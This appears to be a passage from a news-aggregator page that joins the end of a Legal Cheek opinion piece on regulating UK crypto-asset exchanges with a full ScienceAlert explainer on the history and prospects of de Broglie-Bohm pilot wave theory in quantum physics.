The other libertarian counter-argument would be to argue that investment decisions are personal commercial decisions that inherently involve some level of risk, and that excessively regulating these exchanges would not prevent the ignorant, the gullible, or the fearless from similar decisions that would be equally risky or dangerous. Ones right to plunge ones entire life savings into Bitcoin should be zealously guarded, no matter how crazy such a decision may seem, so the argument goes. However, I think a distinction needs to be made between raising regulatory standards to better inform consumer choice, and banning these exchanges outright. The desire for the UK to grow into a global fintech hub should also be balanced with the consumer risks inherent to these platforms. The priority should not be to discourage the flourishing of fintech businesses and start-ups, but to ensure that any crypto-asset exchange legitimately operating in the UK measures up to a rigorous and sufficient AML/KYC regulatory regime, which would in turn protect consumers.

The reality of course is that while the FCA continually warns retail investors that they risk losing all their money by transacting on these unregulated exchanges, there will always be those who choose to ignore these warnings. But by actively regulating these exchanges and presenting a stark choice between the legitimate and the unregulated, retail traders on unregulated exchanges would have to take stronger ownership of their personal choices, and whatever risks these choices may entail.

Hui Ting Tan is a law graduate and LLM student at the LSE. He is an aspiring commercial solicitor.

Read the original:
How to tackle cyber hacks on crypto exchanges - Legal Cheek

Read More..

Could an Overlooked Quantum Theory Help The Universe Make Sense Again? – ScienceAlert

Back in the 1920s, when the field of quantum physics was still in its infancy, a French scientist named Louis de Broglie had an intriguing idea.

In response to confusion over whether light and matter were fundamentally particles or waves, he suggested an alternative: what if both were true? What if the paths taken by quantum objects were guided by something that rose and fell like an ocean swell?

His hypothesis was the foundation of what would later become pilot wave theory, but it wasn't without its problems. So, like any beautiful idea that falters in the face of experiment, it swiftly became a relic of scientific history.

Today, the majority of physicists subscribe to what's referred to as the 'Copenhagen interpretation of quantum mechanics', which, generally speaking, doesn't give precise locations and momentums to particles until they're measured, and therefore observed.

Pilot wave theory, on the other hand, suggests that particles do have precise positions at all times, but in order for this to be the case, the world must also be strange in other ways which led to many physicists dismissing the idea.

Yet something about De Broglie's surfing particles makes it impossible to leave alone, and over the past century, the idea continues to increasingly pop up in modern physics.

For some, it's a concept that could finally help the Universe make sense from the tiniest quantum particles to the largest galaxies.

To better understand what a pilot wave is, it helps to first understand what it is not.

By the 1920s, physicists were baffled by highly accurate experiments on light and subatomic particles, and why their behavior seemed more like that of a wave than a particle.

The results were best explained by a new field of mathematics, one that incorporated probability theory with the mechanics of wave behavior.

To theoretical physicists like Danish theorist Niels Bohr and his German colleague Werner Heisenberg, who set the foundations of the Copenhagen interpretation, the most economical explanation was to treat probability as a fundamental part of nature. What behaved like a wave was an inherent uncertainty at work.

This isn't merely the kind of uncertainty a lack of knowledge brings. According to Bohr, it was as if the Universe was yet to make up its mind on where to put a particle, what direction it should be twisting, and what kind of momentum it might have. These properties, he maintained, can only be said to exist once an observation has been made.

Just what any of this means on an intuitive level is hard to say. Prior to quantum physics, the mathematics of probability were tools for predicting the roll of a dice, or the turning of a wheel. We can picture a stack of playing cards sitting upside down on a table, its hidden sequence locked in place. Mathematics merely puts our ignorance in order while reality exists with 100 percent certainty in the background.

Now, physicists were proposing a flavor of probability that wasn't about our naivety. And that isn't as easy to imagine.

De Broglie's idea of a hypothetical wave was meant to return some kind of physicality to the notion of probability. The scattered patterns of lines and dots observed in experiments are just as they seem consequences of waves rising and falling through a medium, little different to a ripple on a pond.

And somewhere on that wave is an actual particle. It has an actual position, but its destiny is in the hands of changes in the flow of the fluid that guides it.

On one level, this idea feels right. It's a metaphor we can relate to far more easily than one of a dithering Universe.

But experimentally, the time wasn't right for de Broglie's simple idea.

"Although de Broglie's view seems more reasonable, some of its initial problems led the scientific community to adopt Bohr's ideas," Paulo Castro, a science philosopher at the University of Lisbon in Portugal, told Science Alert.

Eminent Austrian physicist Wolfgang Pauli, one of the pioneers of quantum physics, pointed out at the time that de Broglie's model didn't explain observations being made on particle scattering, for example.

It also didn't adequately explain why particles that have interacted with one another in the past will have correlating characteristics when observed later, a phenomenon referred to as entanglement.

For around a quarter of a century, de Broglie's notion of particles riding waves of possibilities remained in the shadows of Bohr's and Heisenberg's fundamental uncertainty. Then in 1952, the American theoretical physicist David Bohm returned to the concept with his version, which he called a pilot wave.

Similar to de Broglie's suggestion, Bohm's pilot wave hypothesis combined particles and waves as a partnership that existed regardless of who was watching. Interfere with the wave, though, and its characteristics shift.

Unlike de Broglie's idea, this new proposal could account for the entangled fates of multiple particles separated by time and distance by invoking the presence of a quantum 'potential', which acted as a channel for information to be swapped between particles.

Now commonly referred to as the de Broglie-Bohm theory, pilot waves have come a long way in the decades since.

"The new main hypothesis is that the quantum wave encodes physical information, acting as a natural computation device involving possible states," says Castro.

"So, one can have whatever superposition of states encoded as physical information in the tridimensional wave. The particle changes its state to another by reading the proper information from the wave."

Philosophically speaking, a theory is only as good as the experimental results it can explain and the observations it can predict. No matter how appealing an idea feels, if it can't tell a more accurate story than its competitors, it's unlikely to win over many fans.

Pilot waves fall frustratingly short of contributing to a robust model of nature, explaining just enough about quantum physics in an intuitive way to continue to attract attention, but not quite enough to flip the script.

For example, in 2005 French researchers noticed oil droplets hopped in an odd fashion across a vibrating oil bath, interacting with the medium in a feedback loop that was rather reminiscent of de Broglie's wave-surfing particles. Critical to their observations was a certain quantization of the particle's movements, not unlike the strict measurements limiting the movements of electrons around an atom's nucleus.

The similarities between these macro scale waves and quantum ones were intriguing enough to hint at some kind of unifying mechanics that demanded further investigation.

Physicists at the Niels Bohr Institute in the University of Copenhagen later tested one of the quantum-like findings made on the oil drop analogy based on their interference patterns through a classic double slit experiment, and failed to replicate their results. However, they did detect an 'interesting' interference effect in the altered movements of the waves that could tell us more about waves of a quantum variety.

In a remarkable act of serendipity, Bohr's own grandson a fluid physicist named Tomas Bohr also weighed in on the debate, proposing a thought experiment that effectively rules out pilot waves.

While null results and thought experiments hardly disprove the basic tenets of today's version of de Broglie-Bohm's pilot waves, they reinforce the challenges advocates face in elevating their models to a true theory status.

"The wave quantum memory is a powerful concept, but of course, there is still a lot of work to be done," says Castro.

It's clear there's an aching void at the heart of physics, a gap begging for an intuitive explanation for why reality rides wave-like patterns of randomness.

It's possible the duality of waves and particles has no analogy in our daily experience. But the idea of a wave-like medium that acts as some kind of computational device for physics is just too tempting to leave alone.

For pilot wave theory to triumph, though, physicists will need to find a way to pluck a surfer from its quantum wave and show the two can exist independently. Experimentally, this could be achieved by emitting two particles and separating one from its ride by measuring it.

"Then we make this empty quantum wave interfere with the wave of the other particle, altering the second particle's behavior," says Castro. "We have presented this at the first International Conference on Advances in Pilot Wave Theory."

Practically speaking, the devices required to detect such an event would need to be extremely sensitive. This isn't outside of the bounds of feasibility, but it is a task patiently waiting for an opportunity. Empty pilot waves might even hold the key for solving practical problems in quantum computation by making the waves less prone to surrounding noise.

Future physicists could eventually land on observations that open us to a Universe that makes sense right down to its roots. Should experiments detect something, it'll be a solid indication that far from empty, the heart of physics beats with a pulse. Even when nobody's watching.

All Explainers are determined by fact checkers to be correct and relevant at the time of publishing. Text and images may be altered, removed, or added to as an editorial decision to keep information current.

More:

Could an Overlooked Quantum Theory Help The Universe Make Sense Again? - ScienceAlert

Read More..